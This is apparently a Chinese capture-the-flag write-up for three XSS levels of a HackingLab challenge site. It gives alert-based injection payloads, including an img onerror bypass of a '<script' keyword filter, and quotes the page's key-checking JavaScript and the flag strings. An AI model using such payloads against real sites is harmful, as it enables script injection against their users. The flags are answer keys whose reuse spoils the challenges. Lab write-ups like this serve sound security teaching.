第12题:XSS基础关
题目知识
XSS基础:很容易就可以过关.XSS类题目必须在平台登录才能进行.登录地址请参考左侧<子系统>
做题过程
过关思路:输入<script>alert(HackingLab)</script>就可以出现key
key
key is: myxssteststart!
第13题:XSS基础2:简单绕过
题目知识
很容易就可以过关.估计是过滤了<script这类的关键字;
做题过程
过关思路:输入<img src=x onerror=alert(HackingLab);>就可以出现key
key
key is: xss2test2you
第14题:
题目知识
考察xss检测与绕过
做题过程
- 无意发现这里存在一个小彩蛋。只要用浏览器的控制台,输入javascript:alert(HackingLab);也可以弹出key,汗
orgAlert = window.alert;
ok = 0;
var HackingLab="success!";
function newAlert(a) {
window.alert = orgAlert;
if (a == HackingLab) {
if (ok == 0) ok = 1;
alert(a);
$.post("./getkey.php?ok=1",{'url':location.href,'ok':ok},function(data){
console.log(data);
});
showkey();
} else {
alert(a);
alert("Please use alert(HackingLab)!!");
}
}
window.alert = newAlert;
function showkey(){
//XSS题目要自觉.....无论如何都是可以绕过的,索性不加密不编码js了,大家一起玩吧.
var url="./getkey.php";
$.post(url,{"getkey":"T"},function(data){
$("#msg").text(data);
});
}
key
xss3test2youOK_striptag